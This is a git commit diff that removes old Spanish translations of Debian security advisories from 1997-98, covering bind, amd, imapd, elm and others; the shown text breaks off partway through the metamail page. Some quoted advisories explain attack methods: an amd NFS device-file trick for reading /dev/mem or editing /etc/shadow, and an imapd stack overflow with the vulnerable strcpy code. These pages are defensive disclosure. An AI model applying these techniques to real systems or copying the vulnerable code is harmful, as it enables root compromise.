diff options
author | Laura Arjona Reina <larjona@debian.org> | 2023-10-05 20:41:58 +0200 |
---|---|---|
committer | Laura Arjona Reina <larjona@debian.org> | 2023-10-05 20:42:51 +0200 |
commit | 990fdc128cc47e6bcd66132313442b1d95a54ae9 (patch) | |
tree | ca274057dd0acfb7280b27a875751da8f37fcd34 /spanish/security | |
parent | bccb056047f1babdcc6cb39502b45cc2c6d0ba0b (diff) |
[Spanish] remove very old files that were removed from /english folder many years ago
Diffstat (limited to 'spanish/security')
31 files changed, 0 insertions, 2130 deletions
diff --git a/spanish/security/amd.htm b/spanish/security/amd.htm deleted file mode 100644 index 11c269d0651..00000000000 --- a/spanish/security/amd.htm +++ /dev/null @@ -1,37 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../PICS/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux -">Información sobre Seguridad</H1> -<HR> - -<P>Por favor, envie las noticias de fallos relacionados con la seguridad a <A HREF="mailto:security@debian.org">security@debian.org</A><P> - -<DL> -<DT>Fecha notificación: - <DD>7 de Abril, 1997</DD> -<DT>Paquetes afectados: - <DD>amd</DD> -<DT>Breve descripción: - <DD>amd ignora la opción nodev</DD> -<DT>Vulnerable: - <DD><FONT COLOR="#FF0000">Sí</FONT> -<DT>Corregido en: - <DD>amd upl102-11 -<DT>Entrada en distribución: - <DD>Debian 1.2.10, versión del 16 de Abril, contiene este paquete -<DT>Para más información: - <DD><A HREF="info/amd-nodev.html">Seguridad-Linux</A> -</DL> - -<P><SMALL>Última modificación: 10 Enero 1998. Copyright -©1997 SPI; Ver <A HREF="license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> diff --git a/spanish/security/bind.htm b/spanish/security/bind.htm deleted file mode 100644 index 694c8912c8c..00000000000 --- a/spanish/security/bind.htm +++ /dev/null @@ -1,75 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Informacion sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux -"> Información sobre Seguridad</H1> -<HR> - -<P>Por favor, envie las noticias de fallos relacionados con la seguridad a <A HREF="mailto:security@debian.org">security@debian.org</A><P> - -<DL> -<DT>Fecha notificación: no-publica - 1 de Abril de 1998; publica - 8 de Abril de 1998 -<P> -<DT>Paquetes afectados: bind 4.9 previos a 4.9.7-1 y bind 8 previos a 8.1.2-1 -<P> -<DT>Breve descripción: - <DD>Versiones más antiguas del bind son vulnerables a un desbordamiento de 'buffer' durante una solicitud de pregunta inversa (inverse query request), permitiendo potencialmente el acceso al sistema como root. Vulnerabilidades adicionales permiten el rechazo a los 'ataques al servicio' en el servicio bind. -<P> -<DT>Vulnerable: <FONT COLOR="#FF0000">Sí</FONT> -<P> -<DT>Corregido en: - <DD>bind 4.9.7-2 en Debian GNU/Linux 1.3.1 alias bo -<HR> - <DD>Archivos fuente: - <DD>http://ftp.debian.org/debian/bo-updates/bind_4.9.7-2.dsc - <DD><SMALL>(MD5 checksum: e8414fc30c7f9439051a8afffd7c43f)</SMALL> - <DD>http://ftp.debian.org/debian/bo-updates/bind_4.9.7-2.diff.gz - <DD><SMALL>(MD5 checksum: e2553787cab0b08da2947ed8d42201d3)</SMALL> - <DD>http://ftp.debian.org/debian/bo-updates/bind_4.9.7.orig.tar.gz - <DD><SMALL>(MD5 checksum: a8a5e3ddef2be0c27c65b92f6cd9a53e)</SMALL><P> - - <DD>Arquitectura Intel:</DD> - <DD>http://ftp.debian.org/debian/bo-updates/bind_4.9.7-2_i386.deb - <DD><SMALL>(MD5 checksum: 08084183427d9259f34fd0460a610f01)</SMALL> -P> -<DD>Estos ficheros serán trasladados a http://ftp.debian.org/debian/bo/source/ y ftp://ftp.debian.org/debian/bo/binary-i386/ posteriormente. -<P> -<DT>Corregido en: - <DD>bind 1:8.1.2-1 en Debian GNU/Linux pre2.0 alias hamm -<HR> - <DD>Archivos fuente: - <DD>http://ftp.debian.org/debian/hamm/hamm/source/net/bind_8.1.2-1.diff.gz - <DD><SMALL>(MD5 checksum: 5f50024f6661dc7ed5dadf83d964b58e)</SMALL> - <DD>http://ftp.debian.org/debian/hamm/hamm/source/net/bind_8.1.2-1.dsc - <DD><SMALL>(MD5 checksum: 67efab5f2e4f7ae57db945d926bdbb5d)</SMALL> - <DD>http://ftp.debian.org/debian/hamm/hamm/source/net/bind_8.1.2.orig.tar.gz - <DD><SMALL>(MD5 checksum: 42e47e9a1002754ac19fc15a0c6bb061)</SMALL> -<P> Arquitectura Intel: - <DD>http://ftp.debian.org/debian/hamm/hamm/binary-i386/net/bind_8.1.2-1.deb - <DD><SMALL>MD5 checksum: 6e1116555fb6c421eb75c27717998708</SMALL> -<P> Arquitectura Motorola 68k: - <DD>http://ftp.debian.org/debian/hamm/hamm/binary-m68k/net/bind_8.1.2-1.deb - <DD><SMALL>MD5 checksum: 692593d6bfb4a3c73627d49eac1e478b</SMALL> -<P> Arquitectura Sparc - <DD>http://ftp.debian.org/debian/hamm/hamm/binary-sparc/net/bind_8.1.1-7.deb - <DD><SMALL>MD5 checksum: d5d665d8b6bf1009eb1b23ef3c1bf736</SMALL> -<P> Arquitectura Alpha - <DD>http://ftp.debian.org/debian/hamm/hamm/binary-alpha/net/bind_8.1.2-1.deb - <DD><SMALL>MD5 checksum: 05dade39b728576e805096ae440d3938</SMALL> -<P> Arquitectura PowerPC - <DD>http://ftp.debian.org/debian/hamm/hamm/binary-powerpc/net/bind_8.1.2-1.deb - <DD><SMALL>MD5 checksum: c8ea22885efe55381b70002a4678c607</SMALL> -<P> -<DT>Entrada en distribución: 19 de Abril, 1998 -<DT>Para más información: CERT advisory CA-98.05 -</DL><P><SMALL>e;ltima Modificación: 11 de Mayo, 1998. Copyright -©1997 SPI; Ver <A HREF="license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> diff --git a/spanish/security/deliver.htm b/spanish/security/deliver.htm deleted file mode 100644 index 77aaa583e2f..00000000000 --- a/spanish/security/deliver.htm +++ /dev/null @@ -1,40 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<DL> -<DT>Fecha notificación: - <DD>10 de Enero, 1998 -<DT>Paquetes afectados: - <DD>deliver -<DT>Breve descripción: - <DD>El desbordamiento de buffer puede permitir el acceso como root. deliver no se utiliza en Debian por defecto por lo que la mayoría de los usuarios no se verán afectados. -<DT>Vulnerable: - <DD><FONT COLOR="#FF0000">Sí</FONT> -<DT>Corregido en: - <DD>deliver 2.1.13, disponible en bo-updates -<DT>Entrada en distribución: - <DD>11 de Enero 1998 -<!-- -<DT>Para más información: - <DD> ---> -</DL> - -<P><SMALL>Última modificación: 15 Enero 1998. -Copyright ©1997 SPI; Ver -<A HREF="../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> diff --git a/spanish/security/dwww.html b/spanish/security/dwww.html deleted file mode 100644 index 23316711d35..00000000000 --- a/spanish/security/dwww.html +++ /dev/null @@ -1,36 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<DL> -<DT>Fecha notificación: - <DD>11 de Febrero de 1998 -<DT>Paquetes afectados: - <DD>dwww -<DT>Breve descripción: - <DD>Meta-caractéres de shell permitidos -<DT>Vulnerable: - <DD><FONT COLOR="#FF0000">Sú</FONT> -<DT>Corregido en: - <DD>dwww 1.4.3-1 en hamm, 1.4.2-1 en bo-updates -<DT>Entrada en distribution: - <DD> -</DL> - -<P><SMALL>Última modificación: 29 de Abril, 1998 -Copyright ©1998 SPI; Ver -<A HREF="../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> diff --git a/spanish/security/info/amd-nodev.html b/spanish/security/info/amd-nodev.html deleted file mode 100644 index 4afbabac300..00000000000 --- a/spanish/security/info/amd-nodev.html +++ /dev/null @@ -1,52 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> -Debian se toma la seguridad muy en serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> llegados -a nuestra atención son corregidos en 48 horas. - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Lunes, 7 Abr 1997 22:59:27 -0400 (EDT)</b> <br> -<b>De: Bradley M Keryan <keryan@andrew.cmu.edu></b> <p> - -El amd del fichero amd-920824upl102-6.i386.rpm distribuido con Red Hat -Linux 4.1 no acepta la opción nodev para los sistemas de ficheros NFS y posiblemente otros tipos soportados, permitiendo a cualquier usuario el acceso a los dispositivos en /dev de un sistema, con tal que tengan acceso como root en otra linux box de la red. Además, el amd.conf por defecto de RH 4.1 mapea /net/* al montar NFS, lo que hace que del fallo de de amd un agujero de fácil accesibilidad. <p> - -<b>La "Exploit":</b> <p> - -Un amigo mio que tenía una cuenta en mi máquina encontró un grave agujero de seguridad en amd cuando decidió gastarme una broma usando /dev/dsp a horas impares, pero descubrió que yo había denegado el acceso a /dev/dsp y /dev/audio. Supuso que yo habría olvidado poner las opciones nosuid y nodev en el mapeo de amd para NFS (el mapeo for defecto de Red Hat 4.1, que *tiene* opts=nosuid,nodev), así que creó un dispositivo de caracteres en su máquina con el número mayor 14 y menor 3, permisos 666, exportó el directorio en el que encontraba via NFS, y entró en mi máquina. Utilizó el mapeo /net/* de amd para montar el directorio, y luego utilizó el dispositivo de caracteres en sistema de ficheros NFS montado para tocar los sonidos, a pesar de que /proc/mounts y /etc/mtab mostraban como montado nodev. <p> - -Esta exploit funciona para dispositivos de bloque y de caractéres. Puede ser utilizado para realizar actos más maliciosos que simplemente para tocar sonidos, como explorar /dev/mem para buscar passwords, cambiar permisos de los ficheros o el contenido de /etc/shadow con un editor de discos raw, y diversas y varias otras malas cosas. <p> - -Este fallo puede afectar a cualquier otra distribución que incluya amd, pero tanto el exploit como el fallo solo han sido probados en Red Hat 4.1. <p> - -<b>Solución:</b> - -Un <a href="amd-nodev.patch">one-character typo</a> en el fichero de cabecera de amd específico para linux evita en realidad que pase la opción nodev al kernel. <p> - -Eso es. Evidentemente M_NODEV fue definido para algo más en otra parte, -sin o amd no debería ser compilado. <p> - -Brad Keryan <br> -<a href="mailto:keryan@andrew.cmu.edu">keryan@andrew.cmu.edu</a> <br> -<a href="http://fatale.res.cmu.edu/">http://fatale.res.cmu.edu/</a> -</blockquote> - -<P><SMALL>Última modificacín: 10 Enero 1998. -Copyright ©1997 SPI; Ver -<A HREF="../../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/amd-nodev.patch b/spanish/security/info/amd-nodev.patch deleted file mode 100644 index 27247e4ffcd..00000000000 --- a/spanish/security/info/amd-nodev.patch +++ /dev/null @@ -1,11 +0,0 @@ ---- amd-upl102/config/os-linux.h.bad Mon Apr 7 16:41:51 1997 -+++ amd-upl102/config/os-linux.h Mon Apr 7 16:42:19 1997 -@@ -252,7 +252,7 @@ - - #define M_RDONLY 1 /* mount read-only */ - #define M_NOSUID 2 /* ignore suid and sgid bits */ --#define M_NONDEV 4 /* disallow access to device special files */ -+#define M_NODEV 4 /* disallow access to device special files */ - #define M_NOEXEC 8 /* disallow program execution */ - #define M_SYNC 16 /* writes are synced at once */ - #define M_REMOUNT 32 /* alter flags of a mounted FS */ diff --git a/spanish/security/info/doom.html b/spanish/security/info/doom.html deleted file mode 100644 index 4a5d178de12..00000000000 --- a/spanish/security/info/doom.html +++ /dev/null @@ -1,29 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> -Debian se toma la seguridad muy en serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> llegados a nuestra atención son corregidos en 48 horas. - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>De: <a href="mailto:alan@cymru.net">Alan Cox</a></b> <p> -Secundariamente cualquiera que utilice el script startmouse/startmouse.sh de Doom... que crea un /tmp/gpmscript debería observar que un usuario puede sustituir el script y conseguir al acceso como root. -</blockquote> - -<P><SMALL>Última modificación: 10 Enero 1998. -Copyright ©1997 SPI; Ver -<A HREF="../../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/elm-me+.html b/spanish/security/info/elm-me+.html deleted file mode 100644 index 18d5f5bf120..00000000000 --- a/spanish/security/info/elm-me+.html +++ /dev/null @@ -1,47 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> -Debian se toma la seguridad muy en serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> llegados -a nuestra atención son corregidos en 48 horas. - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>De: John Goerzen <jgoerzen@happy.cs.twsu.edu></b>, Maintainer of elm <br> -<b>Fecha: Jueves, 15 May 1997 11:44:08 -0500</b><p> - -Recientemente ha sido anunciado un agujero de seguridad de Elm en bugtraq y -en consecuencia en la seguridad-linux que podrían llevar a no autorizados, como mínimo, al mail spool de todos los usuarios del sistema.<p> - -El Elm por defecto de Debian para el stable (1.2.x) es Elm. Esta version de Elm es -vulnerable.<p> - -El mailer por defecto para frozen (la versión 1.3 venidera) y unstable -(continuando en desarrolo), Elm-ME+ (una versión mejorada de Elm), es también -vulnerable.<p> - -He parcheado Elm-ME+ para corregir este problema. He descargado los paquetes -en stable, frozen, y unstable. Además, el Elm-ME+ más reciente está siempre disponible vía FTP anónimo desde <a href="ftp://happy.cs.twsu.edu/pub/Debian/binaries/">ftp://happy.cs.twsu.edu/pub/Debian/binaries/</a>. <p> - -Esta versión corregida de Elm-ME+, elm-me+_2.4pl25ME+31-5_i386.deb, está disponible para bajarlo de inmediato en <a href="ftp://happy.cs.twsu.edu/pub/Debian/binaries/elm-me+_2.4pl25ME+31-5_i386.deb">ftp://happy.cs.twsu.edu/pub/Debian/binaries/elm-me+_2.4pl25ME+31-5_i386.deb</a>. <p> - -Aconsejaría a la gente que se actualizara al Elm-ME+ más reciente. Aquellas personas que usan Elm y no Elm-ME+ -- Elm-ME+ corrige también otros fallos , así que la actualización no sería perjudicial. <p> -</blockquote> - -<P><SMALL>Última modificacín: 10 Enero 1998. -Copyright ©1997 SPI; Ver -<A HREF="../../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/imapd.html b/spanish/security/info/imapd.html deleted file mode 100644 index 6d3e77e032c..00000000000 --- a/spanish/security/info/imapd.html +++ /dev/null @@ -1,185 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> -Debian se toma la seguridad muy en serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> llegandos a nuestra atención son corregidos en 48 horas. - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Dom, 2 Mar 1997 21:42:14 -0700</b> <br> -<b>De: David Sacerdote <davids@SECNET.COM></b> <p> - -<pre> - ###### ## ## ###### - ## ### ## ## - ###### ## # ## ## - ## ## ### ## - ###### . ## ## . ######. - - Secure Networks Inc. - - Aviso sobre Seguridad - 2 de Marzo de 1997 - - - Desbordamiento de buffer en imapd r ipop3d -</pre> - -Existe una vulnerabilidad en el mail server toolkit de Mark Crispin que podía permitir a cualquier individuo obtener acceso como root en servidores donde corren imapd y ipop3d. Esta vulnerabilidad se encuentra en los servidores POP3 y IMAP2bis incluidos en la distribución de PINE, así como en los servidores IMAP2bis y IMAP4 incluidos en el IMAP toolkit de Mr. Crispin. <p> - - -<b>Detalles técnicos</b> <p> - -Los vulnerables servidores de correo llaman a una rutina de librería para afectar un "login" de Unix, autentificando al usuario con su password. Existe un desbordamiento de pila -en esta rutina. Esencialmente esto puede permitir a cualquier cliente con la habilidad de intentar un login introducir un nombre de usuario excesivamente largo para hacer que se ejecute cualquier código de la máquina. <p> - -Tanto el servidor POP como el IMAP que Mr. Crispin distribuye descartan los privilegios de supervisor alguna vez después de la fase de autentificación. Desafortunadamente, el desbordamiento ocurre antes de que esto suceda, y la vulnerabilidad de este modo puede permitir acceso como superusuario al atacante. <p> - -La problemática rutina es server_login(), que se encuentra en "log_xxx.c" en el arbol del código dependiente del SO de la distribución de fuentes del servidos. El problema se da debido al intento de la rutina de permitir un comparación insensitiva al caso en el nombre de usuario, que realiza copiando el nombre de usuario facilitado a la rutina en una variable automática en la pila de la rutina. <p> - -El buffer del nombre de usuario es de longitud MAILTMPLEN, por defecto de 1024 bytes. -Desafortunadamente, el buffer de entrada del servidor es mayor que éste, permitiendo a un cliente remoto proporcionar a la rutina un nombre de usuario mayor a los 1024 bytes. Si los caracteres de exceso en el nombre de usuario contienen una dirección valida de memoria virtual, la rutina sobreescribirá su estructura de pila al copiar el nombre de usuario, causando el regreso desde la rutina para saltar a una posición inesperada. <p> - -Interesadamente, el buffer se convierte a minúsculas después de ser copiado. Proporciona un pequeño reto técnico;, ya que el código de la máquina requerido para controlar el servidor contiene caracteres en mayúsculas. A pesar de todo, las modificaciones al código "estandar" de la vulnerabilidad de desbordemiento de pila para invertir los efectos de este lowercasing son triviales. En los i386 4.4BSD, la dirección de MV -necesaria para redireccionar el resultado de server_login() no necesita tener caractéres en mayúsculas. <p> - -El código defectuoso lee: <p> - -<pre> -long server_login (char *user, char *pass, int argc, char *argv[]) -{ - char tmp[MAILTMPLEN]; - struct passwd *pw = getpwnam (user); - /* permite la comparación independiente del caso*/ - if(!pw) pw = getpwnam (lcase (strcpy (tmp, user))); - - <completar el login del servidor y volver> -} -</pre> - - -<b>Impacto</b> <p> - - -Individuos remotos, que no tiene un nombre de usuario y password válido para -el servidor de correo, pueden obtener el acceso como root en sistemas donde corre un servidor IMAP o POP vulnerable. <p> - - -<b>Sistemas vulnerables</b> <p> - -Cualquier sistema donde se ejecute el servidos POP o IMAP de Mark Crispin, de una versión -anterior al 4.1beta es vulnerable. Para determinar si su sistema es vulnerable, realice un telnet a los puertos 109, 110, 143 y 220. Si ve un encabezamiento como: <p> - -<pre> -* OK example.com IMAP2bis Service 7.8(92) at Mon, 3 Mar 1997 12:00:00 --0500 (EST) - -o: - -* OK example.com IMAP4 v10.00 server ready - -o: - -+OK example.com POP3 3.0(10) w/IMAP client (Report problems in this server -to MRC@CAC.Washington.edu) at Mon, 3 Mar 1998 12:00:00 -0500 (EST) -</pre> - - -Entonces su sistema es vulnerable. Si ve "POP3 3.3" o "IMAP4rev1" -o posterior, su servidor POP o IMAP no es vulnerable. <p> - -Los servidores POP que no derivan del código de Mark Crispin, incluyendo los a veces confusamente llamados "pop3d" de la University of California en Davis no son vulnerables al ataque descrito en este aviso. Del mismo modo, el poper, y los servidores POP derivados, incluyendo el Qualcomm popper, de la University of California en Berkeley, no son vulnerables a este ataque. <p> - -<b>Información sobre la solución</b> <p> - -Como un trabajo temporal, puede inhabilitar los servicios POP y IMAP en /etc/inetd.conf, y luego matar y reiniciar inetd. <p> - -Puede corregir el problema en el fuente por sí mismo, cambiando la función -server_login() para leer: <p> - -<pre> - char tmp[MAILTMPLEN]; - struct passwd *pw = getpwnam (user); - - if(!pw) { - strncpy(tmp, user, MAILTMPLEN - 1); - pw = getpwnam(lcase(tmp)); -</pre> - -O, como última opción, puede cambiar a la distribución IMAP 4.1 beta, -que puede encontrarse en <a href="ftp://ftp.cac.washington.edu/mail/imap.tar.Z">ftp://ftp.cac.washington.edu/mail/imap.tar.Z</a>. <p> - -<b>Información adicional</b> <p> - -Si tiene alguna pregunta sobre este aviso, puede contactar conmingo, -enviando un mensaje a davids@secnet.com Si desea cifrar su mensaje -, puede usar la siguiente clave pública de PGP. <p> - -<pre> ------BEGIN PGP PUBLIC KEY BLOCK----- -Version: 2.6.2 - -mQCNAzJ4qJAAAAEEAOgB7mooQ6NgzcUSIehKUufGsyojutC7phVXZ+p8FnHLLZNB -BLQEtj5kmfww2A2pR29q4rgPeqEUOjWPlLNdSLby3NI8yKz1AQSQLHAwIDXt/lku -8QXClaV6pNIaQSN8cnyyvjH6TYF778yZhYz0mwLqW6dU5whHtP93ojDw1UhtAAUR -tCtEYXZpZCBTYWNlcmRvdGUgPGRhdmlkc0BzaWxlbmNlLnNlY25ldC5jb20+ -=LtL9 ------END PGP PUBLIC KEY BLOCK----- -</pre> - -Más información acerca del Interactive Mail Access Protocol puede obtenerse en los RFCs 1731, 1732, 1733, 2060, 2061, 2062, 2086, 2087, 2088, y -2095. Más información acerca del Post Office Protocol puede obtenerse en los RFCs 1939 y 1957. Copias de los RFCs se pueden encontrar en <a href="http://ds.internic.net/rfc/rfcXXXX.txt">http://ds.internic.net/rfc/rfcXXXX.txt</a>. <p> - -Para más información sobre Secure Networks Inc, incluyendo información sobre los productos, avisos anteriores, y documentos, ver <a href="http://www.secnet.com/">http://www.secnet.com/</a>. - -Si desea obtener consejos de Secure Networks por medio de nuestra lista de correo, por favor envie un mail a sni-advisories-request@secnet.com, con una sola linea que diga: -subscribe sni-advisories <p> - - -<b>Copyright</b> <p> - - -Los contenidos de este aviso son Copyright (C) 1997 Secure Networks Inc, -y pueden ser distribuidos libremente a condición de que no sea cargada ninguna cuota por -su distribución, y que el credito adecuado sea dado. <p> - -imapd and ipop3d están bajo la siguiente licencia: <p> - -Copyright 1997 by the University of Washington <p> - -Permission to use, copy, modify, and distribute this software and its -documentation for any purpose and without fee is hereby granted, provided -that the above copyright notice appears in all copies and that both the -above copyright notice and this permission notice appear in supporting -documentation, and that the name of the University of Washington not be -used in advertising or publicity pertaining to distribution of the software -without specific, written prior permission. This software is made -available "as is", and -THE UNIVERSITY OF WASHINGTON DISCLAIMS ALL WARRANTIES, EXPRESS OR IMPLIED, -WITH REGARD TO THIS SOFTWARE, INCLUDING WITHOUT LIMITATION ALL IMPLIED -WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE, AND IN -NO EVENT SHALL THE UNIVERSITY OF WASHINGTON BE LIABLE FOR ANY SPECIAL, -INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM -LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, TORT -(INCLUDING NEGLIGENCE) OR STRICT LIABILITY, ARISING OUT OF OR IN CONNECTION -WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. - -</blockquote> - -<P><SMALL>Última modificación: 10 Enero 1998. -Copyright ©1997 SPI; Ver -<A HREF="../../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/inetd-groups.html b/spanish/security/info/inetd-groups.html deleted file mode 100644 index 34c3ff811a7..00000000000 --- a/spanish/security/info/inetd-groups.html +++ /dev/null @@ -1,50 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 HEIGHT=140 ALIGN="middle" ALT="Debian GNU/Linux - ">Información sobre Seguridad</H1> -<HR> -Debian se toma la seguridad muy en serio. La mayoría de los <a href="../index.html">problemas sobre seguridad</a> llegados -a nuestra atención son corregidos en 48 horas. - -<P> Por favor, envie las noticias de fallos relacionados con la seguridad a <a href="mailto:security@debian.org">security@debian.org</a><P> - -<blockquote> -<b>Fecha: Mar, 25 Mar 1997 02:30:39 -0500</b> <br> -<b>De: David Holland <dholland@eecs.harvard.edu></b> <p> - -<pre> - > En el mensage <Pine.SUN.3.94.970324024042.15592A@dfw.dfw.net> Aleph One escribió: - > : tftpd en la distribución de FreeBSD utiliza chroot() y no asigna su uid a nadie. - > : No creo, que haga algo razonable con los grupos. - > - > El de FreeBSD hereda los grupos del proceso que lo invoca, que es - > inetd. No se si eso es razonable o no, pero creo que significa - > que el grupo será demonio. tftpd no hace nada con los grupos. -</pre> - -Ya que estamos en ello: muchos inetd no limpian las listas de grupos cuando -se inician, por lo que si se mata y reinicia inetd desde su shell de root -los subprocesos de inetd pueden heredar grupos adicionales (probablemente privilegiados). <p> - -No se si en el inetd de FreeBSD padece este problema, pero la versión -actual de Linux sí. (La siguiente versión no lo hará; si es de interés puedo enviar el parche.) <p> - -El impacto de este problema afortunadamente es bastante limitado, y normalmente no existe una razón real para el root de estar en la pila entera de grupos. <p> - -</blockquote> - -<P><SMALL>Última modificación: 10 Enero 1998. -Copyright ©1997 SPI; Ver -<A HREF="../../license.html">condiciones de licencia.</A></SMALL> -<HR> -</BODY> -</HTML> - - diff --git a/spanish/security/info/metamail.html b/spanish/security/info/metamail.html deleted file mode 100644 index 58995983a50..00000000000 --- a/spanish/security/info/metamail.html +++ /dev/null @@ -1,76 +0,0 @@ -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN"> -<!--translation 1.1.1.1--> -<HTML> -<HEAD> -<TITLE>Debian GNU/Linux - Información sobre Seguridad</TITLE> -<META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=iso-8859-1"> -<META HTTP-EQUIV="Pragma" CONTENT="no-cache"> -</HEAD> - -<BODY BGCOLOR="#FFFFFF"> -<H1><IMG SRC="../../Pics/debian.jpg" WIDTH=114 